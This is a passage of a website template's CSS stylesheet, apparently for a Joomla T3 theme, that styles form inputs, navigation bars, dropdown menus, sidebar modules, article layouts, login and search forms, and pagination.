  color: #999999;
  opacity: 1;
}
select:-ms-input-placeholder,
textarea:-ms-input-placeholder,
input[type="text"]:-ms-input-placeholder,
input[type="password"]:-ms-input-placeholder,
input[type="datetime"]:-ms-input-placeholder,
input[type="datetime-local"]:-ms-input-placeholder,
input[type="date"]:-ms-input-placeholder,
input[type="month"]:-ms-input-placeholder,
input[type="time"]:-ms-input-placeholder,
input[type="week"]:-ms-input-placeholder,
input[type="number"]:-ms-input-placeholder,
input[type="email"]:-ms-input-placeholder,
input[type="url"]:-ms-input-placeholder,
input[type="search"]:-ms-input-placeholder,
input[type="tel"]:-ms-input-placeholder,
input[type="color"]:-ms-input-placeholder,
.inputbox:-ms-input-placeholder {
  color: #999999;
}
select::-webkit-input-placeholder,
textarea::-webkit-input-placeholder,
input[type="text"]::-webkit-input-placeholder,
input[type="password"]::-webkit-input-placeholder,
input[type="datetime"]::-webkit-input-placeholder,
input[type="datetime-local"]::-webkit-input-placeholder,
input[type="date"]::-webkit-input-placeholder,
input[type="month"]::-webkit-input-placeholder,
input[type="time"]::-webkit-input-placeholder,
input[type="week"]::-webkit-input-placeholder,
input[type="number"]::-webkit-input-placeholder,
input[type="email"]::-webkit-input-placeholder,
input[type="url"]::-webkit-input-placeholder,
input[type="search"]::-webkit-input-placeholder,
input[type="tel"]::-webkit-input-placeholder,
input[type="color"]::-webkit-input-placeholder,
.inputbox::-webkit-input-placeholder {
  color: #999999;
}
textareaselect,
textareatextarea,
textareainput[type="text"],
textareainput[type="password"],
textareainput[type="datetime"],
textareainput[type="datetime-local"],
textareainput[type="date"],
textareainput[type="month"],
textareainput[type="time"],
textareainput[type="week"],
textareainput[type="number"],
textareainput[type="email"],
textareainput[type="url"],
textareainput[type="search"],
textareainput[type="tel"],
textareainput[type="color"],
textarea.inputbox {
  height: auto;
}
@media screen and (min-width: 768px) {
  select,
  textarea,
  input[type="text"],
  input[type="password"],
  input[type="datetime"],
  input[type="datetime-local"],
  input[type="date"],
  input[type="month"],
  input[type="time"],
  input[type="week"],
  input[type="number"],
  input[type="email"],
  input[type="url"],
  input[type="search"],
  input[type="tel"],
  input[type="color"],
  .inputbox {
    width: auto;
  }
}
select,
select.form-control,
select.inputbox,
select.input {
  padding-right: 5px;
}
.input-append .active,
.input-prepend .active {
  background-color: #9bd7a8;
  border-color: #3e9b52;
}
.invalid {
  border-color: #cc0000;
}
label.invalid {
  color: #cc0000;
}
input.invalid {
  border: 1px solid #cc0000;
}

.caret {
  margin-left: 5px;
  margin-top: -2px;
}
.dropdown-menu {
  padding: 0;
  min-width: 200px;
}
.dropdown-menu .divider {
  margin: 0;
  height: 10px;
  background-color: #373737;
}
.dropdown-menu > li {
  border-top: 1px solid #515151;
}
.dropdown-menu > li:first-child {
  border-top: 0;
}
.dropdown-menu > li > a {
  padding: 10px 20px;
}
.dropdown-header {
  padding: 3px 20px;
  font-size: 14px;
}
.dropdown-header a {
  color: #999999;
}
.dropdown-submenu > a:after {
  border-left-color: #999999;
}
.dropdown-submenu:hover > a:after {
  border-left-color: #ffffff;
}
.nav > li > .separator {
  position: relative;
  display: block;
  padding: 10px 15px;
  line-height: 20px;
}
@media (min-width: 991px) {
  .nav > li > .separator {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.nav-tabs {
  border-bottom: 1px solid #eeeeee;
}
.nav-tabs > li > a {
  padding: 10px;
  line-height: normal;
  border: 0;
  text-transform: uppercase;
}
.nav-tabs > li > a:hover {
  border: 0;
  background: transparent;
}
.nav-tabs > li.active > a {
  background: #444444;
  border: 0;
  color: #fff;
  margin-bottom: 0;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  background: #444444;
  border: 0;
  color: #fff;
}
.tab-content {
  padding: 10px 0;
  border-top: 0;
}
.nav .caret {
  border-top-color: #10bf00;
  border-bottom-color: #10bf00;
}
.nav a:hover .caret {
  border-top-color: #0a7300;
  border-bottom-color: #0a7300;
}
.t3-navhelper {
  background: #eeeeee;
  color: #999999;
  padding: 5px 0;
}
.breadcrumb {
  margin-bottom: 0;
  padding-left: 0;
  padding-right: 0;
  border-radius: 0;
}
.breadcrumb > li + li:before {
  content: "/\00a0";
}
.breadcrumb > li:nth-child(2):before {
  content: "";
}
.breadcrumb > .active {
  color: #999999;
}
.breadcrumb .divider {
  display: none;
}
.pagination {
  display: block;
}
.pagination:before,
.pagination:after {
  content: " ";
  display: table;
}
.pagination:after {
  clear: both;
}
@media screen and (min-width: 768px) {
  .pagination {
    float: left;
  }
}
.pagination .pagination {
  display: inline-block;
}
.counter {
  display: inline-block;
  margin-top: 20px;
  padding: 6px 12px;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-radius: 0px;
}
@media screen and (min-width: 768px) {
  .counter {
    float: right;
  }
}

.navbar-toggle {
  padding: 0;
  height: 55px;
  line-height: 55px;
  width: 55px;
  margin: 0;
  position: absolute;
  right: 0;
  top: 0;
}
.navbar-toggle:hover,
.navbar-toggle:active,
.navbar-toggle:focus {
  outline: none;
  -webkit-box-shadow: none;
  box-shadow: none;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -15px;
}
@media (min-width: 991px) {
  .navbar-nav {
    margin: 0;
  }
}
.navbar-default {
  background-color: #10bf00;
  border-color: #0ea600;
}
.navbar-default .navbar-text {
  color: #c4ffbf;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li {
    margin-left: 30px;
  }
}
.navbar-default .navbar-nav > li > a {
  color: #c4ffbf;
  padding: 20px;
  text-transform: uppercase;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a {
    padding: 0;
    line-height: 55px;
  }
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > li > a:hover,
  .navbar-default .navbar-nav > li > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .active > a,
  .navbar-default .navbar-nav > .active > a:hover,
  .navbar-default .navbar-nav > .active > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-toggle {
  border: 0;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background: #0ea600;
  color: #ffffff;
}
.navbar-default .navbar-toggle .icon-bar,
.navbar-default .navbar-toggle .fa-bars {
  background-color: transparent;
  color: #c4ffbf;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #0ea600;
}
.navbar-default .navbar-nav > .dropdown > a:hover .caret,
.navbar-default .navbar-nav > .dropdown > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  background-color: transparent;
  color: #ffffff;
}
@media screen and (min-width: 991px) {
  .navbar-default .navbar-nav > .open > a,
  .navbar-default .navbar-nav > .open > a:hover,
  .navbar-default .navbar-nav > .open > a:focus {
    -webkit-box-shadow: inset 0 -2px 0 #ffffff;
    box-shadow: inset 0 -2px 0 #ffffff;
  }
}
.navbar-default .navbar-nav > .open > a .caret,
.navbar-default .navbar-nav > .open > a:hover .caret,
.navbar-default .navbar-nav > .open > a:focus .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
.navbar-default .navbar-nav > .dropdown > a .caret {
  border-top-color: #c4ffbf;
  border-bottom-color: #c4ffbf;
}
@media (max-width: 991px) {
  .navbar-default .navbar-nav .open .dropdown-menu {
    background: #0ea600;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li {
    border-top-color: #0c8c00;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #c4ffbf;
    padding: 20px 20px 20px 30px;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
@media screen and (max-width: 991px) {
  .navbar-default .navbar-nav .open .level2.dropdown-menu {
    background: #0c8c00;
    border-top: 1px solid #0a7300;
    margin-top: 0;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li {
    border-top-color: #0a7300;
  }
  .navbar-default .navbar-nav .open .level2.dropdown-menu > li > a {
    padding-left: 40px;
  }
}
.navbar-default .navbar-link {
  color: #c4ffbf;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.t3-mainnav {
  border: 0;
  border-bottom: 1px solid #0ea600;
  margin-bottom: 0;
  border-radius: 0;
}
@media (min-width: 991px) {
  .t3-mainnav > .container {
    position: relative;
  }
}
.t3-mainnav .t3-navbar {
  padding-left: 0;
  padding-right: 0;
  float: left;
}
.t3-mainnav .t3-navbar-collapse {
  margin-top: 55px;
}
@media (min-width: 991px) {
  .t3-mainnav .t3-navbar-collapse {
    display: none !important;
  }
}
.t3-mainnav .t3-navbar-collapse .navbar-nav {
  margin: 0 -15px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav li > a .fa {
  margin-right: 5px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li > a {
  border-top: 1px solid #0ea600;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav > li:first-child > a {
  border-top: 0;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .open .dropdown-menu {
  left: -1px;
}
.t3-mainnav .t3-navbar-collapse .navbar-nav .dropdown > a .caret {
  position: absolute;
  top: 40%;
  right: 12px;
}

.t3-module {
  background: transparent;
  color: inherit;
  margin-bottom: 20px;
}
@media screen and (min-width: 768px) {
  .t3-module {
    margin-bottom: 40px;
  }
}
.t3-module .module-inner {
  padding: 0;
}
.module-title {
  background: transparent;
  color: inherit;
  font-size: 18px;
  font-weight: bold;
  margin: 0 0 10px 0;
  padding: 0;
}
@media screen and (min-width: 768px) {
  .module-title {
    margin-bottom: 20px;
  }
}
.module-ct {
  background: transparent;
  color: inherit;
  padding: 0;
}
.module-ct:before,
.module-ct:after {
  content: " ";
  display: table;
}
.module-ct:after {
  clear: both;
}
.module-ct > ul,
.module-ct .custom > ul,
.module-ct > ol,
.module-ct .custom > ol {
  margin-left: 20px;
  padding-left: 0;
}
.module-ct > ul.unstyled,
.module-ct .custom > ul.unstyled,
.module-ct > ol.unstyled,
.module-ct .custom > ol.unstyled {
  padding-left: 0;
}
.module-ct > ul.nav,
.module-ct .custom > ul.nav,
.module-ct > ol.nav,
.module-ct .custom > ol.nav {
  padding-left: 0;
  margin-left: 0;
}
.t3-sidebar .nav > li {
  border-top: 1px solid #eeeeee;
  margin-top: 0;
}
.t3-sidebar .nav > li:first-child {
  border-top: 0;
}
.t3-sidebar .nav > li > a,
.t3-sidebar .nav > li > .separator {
  padding: 10px;
  display: block;
}
.t3-sidebar .nav > li.active.open > a {
  background-color: #0ea600;
  color: #ffffff;
}
.t3-sidebar .nav > li > a:hover,
.t3-sidebar .nav > li.open > a {
  background-color: #eeeeee;
  color: #444444;
}
.t3-sidebar .nav > li > a:hover .caret,
.t3-sidebar .nav > li.open > a .caret {
  border-bottom-color: #444444;
  border-top-color: #444444;
}
.t3-sidebar .dropdown-menu {
  margin-top: 0;
}
.t3-sidebar .nav > li.active > a .caret {
  border-top-color: #ffffff;
  border-bottom-color: #ffffff;
}
@media (max-width: 1450px) {
  .t3-sidebar.t3-sidebar-2 .dropdown-submenu.parent.open > .dropdown-menu,
  .t3-sidebar.t3-sidebar-right .dropdown-submenu.parent.open > .dropdown-menu {
    left: auto;
    right: 100%;
  }
}
#login-form input[type="text"],
#login-form input[type="password"] {
  width: 100%;
}
#login-form ul.unstyled {
  margin: 0;
  padding: 0;
}
#login-form ul.unstyled li {
  list-style-type: none;
}
#login-form #form-login-remember label {
  font-weight: normal;
}
.banneritem a {
  font-weight: bold;
}
.bannerfooter {
  border-top: 1px solid #eeeeee;
  font-size: 12px;
  padding-top: 10px;
  text-align: right;
}
.categories-module,
ul.categories-module,
.category-module,
ul.category-module {
  margin: 0;
  padding: 0;
}
.categories-module li,
ul.categories-module li,
.category-module li,
ul.category-module li {
  list-style: none;
  padding: 10px 0;
  border-top: 1px dotted #eeeeee;
}
.categories-module li:first-child,
ul.categories-module li:first-child,
.category-module li:first-child,
ul.category-module li:first-child {
  border-top: 0;
  padding-top: 0;
}
.categories-module h4,
ul.categories-module h4,
.category-module h4,
ul.category-module h4,
.categories-module .mod-articles-category-title,
ul.categories-module .mod-articles-category-title,
.category-module .mod-articles-category-title,
ul.category-module .mod-articles-category-title {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
  display: block;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby,
.categories-module .mod-articles-category-date,
ul.categories-module .mod-articles-category-date,
.category-module .mod-articles-category-date,
ul.category-module .mod-articles-category-date {
  color: #666666;
  font-size: 12px;
}
.categories-module .mod-articles-category-writtenby,
ul.categories-module .mod-articles-category-writtenby,
.category-module .mod-articles-category-writtenby,
ul.category-module .mod-articles-category-writtenby {
  font-weight: bold;
  margin-right: 10px;
}
.feed h4 {
  font-weight: bold;
}
.feed .newsfeed,
.feed ul.newsfeed {
  border-top: 1px solid #eeeeee;
}
.feed .newsfeed .feed-link,
.feed ul.newsfeed .feed-link,
.feed .newsfeed h5.feed-link,
.feed ul.newsfeed h5.feed-link {
  font-size: 14px;
  font-weight: normal;
  margin: 0;
}
.latestusers,
ul.latestusers {
  margin-left: 0;
}
.latestusers li,
ul.latestusers li {
  background: #eeeeee;
  display: inline-block;
  padding: 5px 10px;
  border-radius: 0px;
}
.module-ct .whosonline {
  margin-left: 0;
}
.module-ct .whosonline > li {
  display: inline-block;
  border-radius: 0px;
  background: #eeeeee;
  padding: 2px 5px;
  margin: 0 5px 5px 0;
  white-space: nowrap;
}
.stats-module dt,
.stats-module dd {
  display: inline-block;
  margin: 0;
}
.stats-module dt {
  font-weight: bold;
  width: 35%;
}
.stats-module dd {
  width: 60%;
}
.tagspopular ul {
  display: block;
  margin: 0;
  padding: 0;
  list-style: none;
  overflow: hidden;
}
.tagspopular ul > li {
  background: #eeeeee;
  border-radius: 3px;
  color: #666666;
  display: block;
  float: left;
  margin: 0 5px 5px 0;
  padding: 3px 10px;
}
.tagspopular ul > li > a {
  color: #666666;
}
.tagspopular ul > li .tag-count {
  background: transparent;
  color: #666666;
  display: inline;
  margin: 0;
  padding: 0;
}
.tagspopular ul > li:hover {
  background: #10bf00;
  color: #ffffff;
}
.tagspopular ul > li:hover a {
  color: #ffffff;
  text-decoration: none;
}
.tagspopular ul > li:hover .tag-count {
  color: #ffffff;
}
.tagspopular.tagscloud .tag {
  background: #eeeeee;
  border-radius: 3px;
  display: inline-block;
  margin-bottom: 5px;
  padding: 5px 10px;
}
.tagspopular.tagscloud .tag a {
  color: #666666;
}
.tagspopular.tagscloud .tag a:hover,
.tagspopular.tagscloud .tag a:focus,
.tagspopular.tagscloud .tag a:active {
  color: #0a7300;
}
.tagssimilar ul {
  margin: 0;
  padding: 0;
  list-style: none;
}
.tagssimilar ul > li {
  border-bottom: 1px solid #eeeeee;
  padding: 8px 0;
}
.tagssimilar ul > li > a {
  color: #666666;
}
.tagssimilar ul > li > a:hover,
.tagssimilar ul > li > a:focus,
.tagssimilar ul > li > a:active {
  color: #0a7300;
}
.module-ct > ul.archive-module {
  list-style: none;
  margin: 0;
  padding: 0;
}
.module-ct > ul.archive-module i {
  color: #999999;
  margin-right: 2px;
}
.module-ct > ul.archive-module li {
  border-bottom: 1px solid #eeeeee;
  padding: 7px 0;
}
.module-ct > ul.archive-module li a {
  color: #666666;
}
.module-ct > ul.archive-module li a:hover,
.module-ct > ul.archive-module li a:focus,
.module-ct > ul.archive-module li a:active {
  color: #10bf00;
}
.module-ct > ol.breadcrumb {
  padding: 6px 12px;
  margin-left: 0;
}

.item-page {
  margin-bottom: 40px;
}
.items-leading .leading {
  margin-bottom: 40px;
}
.items-row .item {
  margin-bottom: 40px;
}
.divider-vertical {
  margin: 20px 0 40px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.article-aside {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
  padding: 0;
}
.article-header + .article-aside {
  margin-top: -10px;
}
.item-page .article-aside {
  font-size: 14px;
  margin-bottom: 40px;
}
.article-info {
  margin: 0;
  width: 85%;
}
.article-info .article-info-term {
  display: none;
}
.article-info dd {
  display: inline-block;
  margin-left: 0;
  margin-right: 10px;
  margin-bottom: 5px;
  white-space: nowrap;
}
.article-info dd strong {
  font-weight: 600;
}
.article-info dd .fa {
  margin-right: 5px;
}
.category-name {
  text-transform: capitalize;
}
.category-name .fa {
  display: none;
}
.category-name a {
  background: #10bf00;
  color: #fff;
  padding: 2px 5px;
}
.category-name a:hover,
.category-name a:focus,
.category-name a:active {
  background: #0a7300;
  color: #fff;
  text-decoration: none;
}
.article-footer {
  color: #999999;
  font-size: 12px;
  margin-bottom: 20px;
}
article img,
.article-intro img {
  display: block;
  max-width: 100%;
  height: auto;
}
article img[align=left],
.article-intro img[align=left],
article .img-fulltext-left,
.article-intro .img-fulltext-left,
article .img-intro-left,
.article-intro .img-intro-left,
article .img_caption.left,
.article-intro .img_caption.left,
article .pull-left.item-image,
.article-intro .pull-left.item-image {
  margin-right: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align=left],
  .article-intro img[align=left],
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img_caption.left,
  .article-intro .img_caption.left,
  article .pull-left.item-image,
  .article-intro .pull-left.item-image {
    margin: 0;
  }
}
article img[align=right],
.article-intro img[align=right],
article .img-fulltext-right,
.article-intro .img-fulltext-right,
article .img_caption.right,
.article-intro .img_caption.right,
article .img-intro-right,
.article-intro .img-intro-right,
article .pull-right.item-image,
.article-intro .pull-right.item-image {
  margin-left: 20px;
  max-width: 100%;
}
@media screen and (max-width: 767px) {
  article img[align=right],
  .article-intro img[align=right],
  article .img-fulltext-right,
  .article-intro .img-fulltext-right,
  article .img_caption.right,
  .article-intro .img_caption.right,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .pull-right.item-image,
  .article-intro .pull-right.item-image {
    margin: 0;
  }
}
.img-intro-none,
.img-intro-left,
.img-intro-right,
.img-fulltext-none,
.img-fulltext-left,
.img-fulltext-right,
.img_caption {
  position: relative;
  margin-bottom: 20px;
  max-width: 100%;
}
.img-fulltext-left {
  float: left;
}
.img-fulltext-right {
  float: right;
}
.img_caption > img {
  margin-bottom: 1px !important;
}
.img_caption p.img_caption {
  background: #eeeeee;
  color: #666666;
  font-size: 12px;
  width: 100%;
  margin: 0;
  padding: 5px;
  text-align: center;
  clear: both;
}
.pull-right.article-image-intro {
  float: left !important;
  margin-left: 0 !important;
}
.pull-right.article-image-intro img {
  margin-left: 0 !important;
  margin-right: 20px;
}
@media screen and (max-width: 992px) {
  article img,
  .article-intro img,
  article img[align=left],
  .article-intro img[align=left],
  article img[align=right],
  .article-intro img[align=right],
  article .img_caption,
  .article-intro .img_caption,
  article .article-image-full,
  .article-intro .article-image-full,
  article .article-image-intro,
  .article-intro .article-image-intro,
  article .img-intro-none,
  .article-intro .img-intro-none,
  article .img-intro-left,
  .article-intro .img-intro-left,
  article .img-intro-right,
  .article-intro .img-intro-right,
  article .img-fulltext-none,
  .article-intro .img-fulltext-none,
  article .img-fulltext-left,
  .article-intro .img-fulltext-left,
  article .img-fulltext-right,
  .article-intro .img-fulltext-right {
    float: none !important;
    margin-left: 0;
    margin-right: 0;
    width: 100% !important;
  }
}
.item-page .tags {
  border-top: 1px solid #eeeeee;
  padding: 10px 0;
}
.item-page .tags span {
  display: inline-block;
  margin-bottom: 10px;
}
.item-page .tags a {
  background: #ffffff;
  border: 1px solid #eeeeee;
  border-radius: 3px;
  color: #666666;
  padding: 5px;
}
.item-page .tags a:hover,
.item-page .tags a:focus,
.item-page .tags a:active {
  background: #999999;
  border-color: #999999;
  color: #0a7300;
}
article aside .btn-group > .dropdown-toggle,
article aside .btn-group > .dropdown-toggle:hover,
article aside .btn-group > .dropdown-toggle:active,
article aside .btn-group > .dropdown-toggle:focus {
  padding: 2px 5px;
}
article aside .btn-group > .dropdown-toggle .caret {
  margin-left: 2px;
}
.tag-category .filters {
  border-bottom: 1px solid #eeeeee;
  padding: 20px 0;
}
@media screen and (min-width: 768px) {
  .tag-category .filters {
    padding: 20px;
  }
}
.tag-category .thumbnails {
  list-style: none;
  margin: 0;
  padding: 0;
}
.tag-category .thumbnails li {
  background: transparent;
  border-bottom: 1px solid #eeeeee;
  padding: 10px 0;
}
.tag-category .thumbnails li > h3 {
  margin-top: 0;
}
.row-even,
.row-odd {
  padding: 5px;
  width: 99%;
  border-bottom: 1px solid #dddddd;
}
.row-odd {
  background-color: transparent;
}
.row-even {
  background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
  border: 0;
}
.row-fluid .row-reveal {
  visibility: hidden;
}
.row-fluid:hover .row-reveal {
  visibility: visible;
}
.nav-list > li.offset > a {
  padding-left: 30px;
  font-size: 12px;
}
.list-striped,
.row-striped {
  list-style: none;
  line-height: 20px;
  text-align: left;
  vertical-align: middle;
  border-top: 1px solid #dddddd;
  margin-left: 0;
  padding-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
  border-bottom: 1px solid #dddddd;
  padding: 10px 15px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
  background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
  background-color: #f5f5f5;
}
.row-striped .row-fluid {
  width: 97%;
}
.row-striped .row-fluid [class*="span"] {
  min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
  margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
  margin-left: 0;
}
.list-condensed li {
  padding: 5px 10px;
}
.row-condensed .row,
.row-condensed .row-fluid {
  padding: 5px 10px;
}
.list-bordered,
.row-bordered {
  list-style: none;
  line-height: 18px;
  text-align: left;
  vertical-align: middle;
  margin-left: 0;
  border: 1px solid #dddddd;
}
.login-wrap .other-links ul {
  padding-left: 15px;
}
.form-register fieldset {
  padding: 0 0 10px;
}
.form-register p {
  margin: 0 0 5px;
}
.form-register p.form-des {
  margin: 15px 0;
}
.form-register label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.form-register .input,
.form-register .inputbox {
  margin-left: 10px;
  width: 200px;
}
.form-register .btn,
.form-register .button {
  margin-left: 140px;
}
.registration fieldset dt {
  margin-right: 5px;
}
.admintable textarea {
  max-width: 90% !important;
  resize: none;
}
.com_mailto body {
  padding: 10px;
}
.com_mailto .t3-mainbody {
  padding-top: 0;
  padding-bottom: 0;
}
.com_mailto .t3-content {
  width: auto;
}
#mailto-window {
  background: #fff;
  margin: 10px 0 20px;
  padding: 0;
  position: relative;
}
#mailto-window h2 {
  margin-top: 0;
  margin-bottom: 20px;
}
#mailtoForm .formelm {
  padding: 5px 0;
  vertical-align: middle;
  overflow: hidden;
}
#mailtoForm .formelm label {
  display: inline-block;
  float: left;
  font-weight: bold;
  vertical-align: middle;
  width: 100px;
}
#mailtoForm p {
  margin-top: 20px;
}
#mailtoForm .input,
#mailtoForm .inputbox {
  width: 65%;
}
#mailtoForm .btn,
#mailtoForm .button,
#mailtoForm button {
  margin-right: 5px;
}
.user-details {
  padding: 10px 0;
}
.user-details p {
  margin: 0 0 5px;
}
.user-details label {
  display: block;
  float: left;
  font-weight: bold;
  text-align: right;
  width: 130px;
}
.user-details .input,
.user-details .inputbox {
  margin-left: 10px;
  width: 200px;
}
.user-details .btn,
.user-details button {
  margin-left: 140px;
}
.user-details .paramlist .paramlist_key {
  padding: 0 0 5px;
  width: 130px;
}
.user-details .paramlist .paramlist_value {
  padding: 0 0 5px;
}
.user-details .user_name span {
  font-weight: bold;
  padding-left: 10px;
}
.reset .form-validate p,
.remind .form-validate p {
  background: #eeeeee;
  border: 1px solid #eeeeee;
  margin-bottom: 20px;
  padding: 10px 20px;
  border-radius: 0px;
}
.reset .form-validate fieldset dl,
.remind .form-validate fieldset dl {
  margin: 0;
}
.reset .form-validate fieldset dt,
.remind .form-validate fieldset dt {
  margin: 4px 0 0 0;
}
.profile-edit input {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit input {
    float: left;
    width: 50%;
  }
}
.profile-edit select {
  position: relative;
  min-height: 1px;
  padding-left: 6px;
  padding-right: 6px;
}
@media (min-width: 768px) {
  .profile-edit select {
    float: left;
    width: 50%;
  }
}
.profile-edit select + button {
  margin-left: 5px;
}
#searchForm:before,
#searchForm:after {
  content: " ";
  display: table;
}
#searchForm:after {
  clear: both;
}
#searchForm fieldset {
  margin: 20px 0;
}
#searchForm legend {
  margin-bottom: 10px;
}
#searchForm select {
  width: auto;
  display: inline-block;
  margin-left: 5px;
  padding-left: 5px;
}
#searchForm .form-limit {
  margin-top: 20px;
}
#searchForm .form-limit .counter {
  margin-top: 0;
  border: none;
  font-size: 14px;
  font-weight: bold;
  color: #0077bb;
}
@media screen and (max-width: 768px) {
  #searchForm .radio-inline,
  #searchForm .checkbox-inline {
    display: block;
    width: 100%;
    margin-left: 0;
  }
}
.search-results {
  margin-top: 20px;
}
.search-results .result-title {
  font-size: 16px;
  font-weight: bold;
  margin-top: 20px;
}
.search-results .result-category {
  font-size: 12px;
  color: #999999;
}
.search-results .result-text {
  margin-top: 5px;
  margin-bottom: 5px;
}
.search-results .result-url {
  color: #666666;
  margin-top: 20px;
}
.search-results .result-created {
  font-size: 12px;
  color: #999999;
}
div.finder {
  margin-bottom: 20px;
}
.filter-branch:after {
  content: "";
  clear: both;
  display: table;
}
.filter-branch .finder-selects {
  margin-right: 20px;
  margin-bottom: 20px;
}
.filter-branch .finder-selects .control-label {
  margin-bottom: 10px;
}
.contact .contact-form .checkbox input#jform_contact_email_copy {
  margin-left: 0;
}
.contact .accordion-heading .accordion-toggle {
  font-weight: bold;
}
#archive-items > li {
  line-height: normal;
  margin: 0;
  overflow: visible;
  padding: 0;
}
#archive-items .intro {
  clear: both;
  overflow: hidden;
}
.categories-list {
  margin-bottom: 20px;
}
.category-item:before,
.category-item:after {
  content: " ";
  display: table;
}
.category-item:after {
  clear: both;
}
.category-item .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.category-item .category-item {
  margin-bottom: 0;
  margin-left: 30px;
}
.category-item .category-item .page-header {
  font-size: 14px;
}
.cat-children .page-header {
  line-height: normal;
  padding: 10px 5px;
  margin: 0;
  font-size: 18px;
  font-weight: normal;
}
.newsfeed-category > h2,
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed-category .category-desc,
.newsfeed .category-desc {
  margin-bottom: 20px;
}
.newsfeed-category .category li:before,
.newsfeed .category li:before,
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  content: " ";
  display: table;
}
.newsfeed-category .category li:after,
.newsfeed .category li:after {
  clear: both;
}
.newsfeed > h2 {
  border-bottom: 1px solid #eeeeee;
  padding-bottom: 20px;
  margin-bottom: 20px;
  margin-top: 0;
}
.newsfeed .feed-description {
  margin-bottom: 20px;
  font-size: 16px;
}
.newsfeed .feed-item-description .feed-description {
  font-size: 14px;
}
.newsfeed ol li > a {
  font-weight: bold;
  font-size: 16px;
}
.article-content .pagination ul {
  border-left: 1px solid #eeeeee;
}
.article-content .pagination li {
  float: left;
  padding: 10px 20px;
  line-height: normal;
  border: 1px solid #eeeeee;
  border-left: 0;
}
.article-content .pagination li a {
  border: 0;
  text-decoration: none;
  background-color: transparent;
  line-height: normal;
  padding: 0;
}
.pagenavcounter {
  margin: 0 0 20px;
  font-weight: bold;
}
#article-index,
.article-index {
  margin: 0 0 20px 20px;
  padding: 10px;
  width: 25%;
  border: 1px solid #eeeeee;
  border-radius: 0px;
}
#article-index ul,
.article-index ul {
  margin: 0;
  padding: 0;
  border: 0;
}
#article-index ul > li,
.article-index ul > li {
  border: 0;
  margin-top: 2px;
}
#article-index ul > li > a,
.article-index ul > li > a {
  border: 0;
  padding: 5px;
  border-radius: 0px;
}
#article-index ul > .active > a,
.article-index ul > .active > a {
  border: 0;
  background: #10bf00;
  color: #ffffff;
}
#article-index ul > .active > a:hover,
.article-index ul > .active > a:hover,
#article-index ul > .active > a:active,
